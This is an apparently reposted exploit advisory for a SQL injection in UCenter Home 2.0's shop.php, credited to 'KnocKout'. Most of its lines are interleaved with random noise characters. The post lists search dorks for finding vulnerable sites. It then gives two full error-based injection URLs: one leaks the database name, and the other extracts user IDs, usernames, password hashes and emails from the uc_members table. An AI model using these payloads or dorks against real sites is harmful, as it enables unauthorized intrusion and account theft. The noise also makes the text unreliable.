" K8 F5 s7 @" ~
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
: I7 g7 D2 x& d; Z8 s! i/ d, k. y4 m0 g
% B: g: \3 W( t7 D2 ~5 U! P, e- L( b( R" a F
*/ Author : KnocKout , r1 y/ n: w- G3 G/ A: i6 q
1 P4 |' J' M3 ?*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
0 r1 h+ B w# K. _& z2 `9 u; g G7 `7 R
*/ Contact: knockoutr@msn.com
6 b3 o I8 d ?! i4 s6 j* ~# @( `; @7 L5 M) V6 p( L
*/ Cyber-Warrior.org/CWKnocKout
8 a( b/ t# `# ?* h( W( {) h0 L! r: v" N9 x- a2 e& y) t6 m7 F) n
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== , Z- k: t: a! L$ W
1 z2 a6 O" \6 Y5 R
Script : UCenter Home 4 `% b0 t4 x5 K G+ A& o
6 h/ I9 L0 v) }' u4 QVersion : 2.0
* O. P# x6 z( @
" U0 J" Q" f8 p- Z2 cScript HomePage : http://u.discuz.net/ + {7 T. l. C* g( q0 {4 ]. r
+ z$ h& m! c& k8 ^# E__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * x8 R9 \( ~2 o! I
1 W1 z9 C. o1 N/ LDork : Powered by UCenter inurl:shop.php?ac=view
$ d' `' N) H K. C' H2 E. U' r- [, v
1 L0 @. Z1 n! K1 |1 eDork 2 : inurl:shop.php?ac=view&shopid=
) u) P( M( z! A* t3 ~* S7 p% n( {, L: l( ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
% L2 R1 h" O! y# F& s4 Z( n
8 m* E8 y; f mVuln file : Shop.php
' C/ d7 k; U9 S* X7 u8 F: S5 v+ p' `
0 h ]/ r! ?3 V) y/ h Evalue's : (?)ac=view&shopid= 7 `1 e' D7 A$ n% @
/ y3 s: T9 G* z
Vulnerable Style : SQL Injection (MySQL Error Based)
: T4 ?2 W6 o5 y; M0 `5 P& M
6 R! k2 T1 K% ^) e9 A% uNeed Metarials : Hex Conversion 4 R {% s) F4 i" _ M, y( e. _9 f
, F* K0 e3 C0 c% \7 ]0 Q4 O3 U
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== $ _" f4 E3 A2 N' g" p0 x
. t6 b, o0 B; h% u6 s/ k* ]
Your Need victim Database name. 2 L$ Q" v: f/ B- A) P8 |7 ]# R
' F% K" A+ b6 v* Efor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
! Q+ _3 L5 r7 W8 Q0 N: i$ M2 f
7 K. s; d; B. Z+ V9 _1 i4 H..
9 Z0 Z$ ~. E# ?/ r- K+ r+ \& y( k5 K8 F( x" _0 W; `
DB : Okey.
# y F4 O2 C, q9 O
4 v: h# L' }( A# |5 byour edit DB `[TARGET DB NAME]` 8 O& s3 n7 A$ L' p% q; w) W
7 {% q( R: o, m R$ [7 DExample : 'hiwir1_ucenter' + B, I" C+ I2 P$ K; ]
2 m: g' i; \, `" ?; @
Edit : Okey.
$ n5 M$ p5 n/ P
5 T# }# i# Q: |3 O+ o; u2 ~Your use Hex conversion. And edit Your SQL Injection Exploit.. 2 _" |, ?4 }+ z5 |; f
9 x# ?5 |" K" |3 U7 I% U1 S
# E! @5 X1 f* t% \& a4 |9 A- l& `
% s4 N% P. C, \8 W# @0 l9 R' w) [7 sExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
; [8 S& `, v+ {/ U! }0 B: J$ U |
发表于 2013-2-27 21:31:31
收藏
支持
反对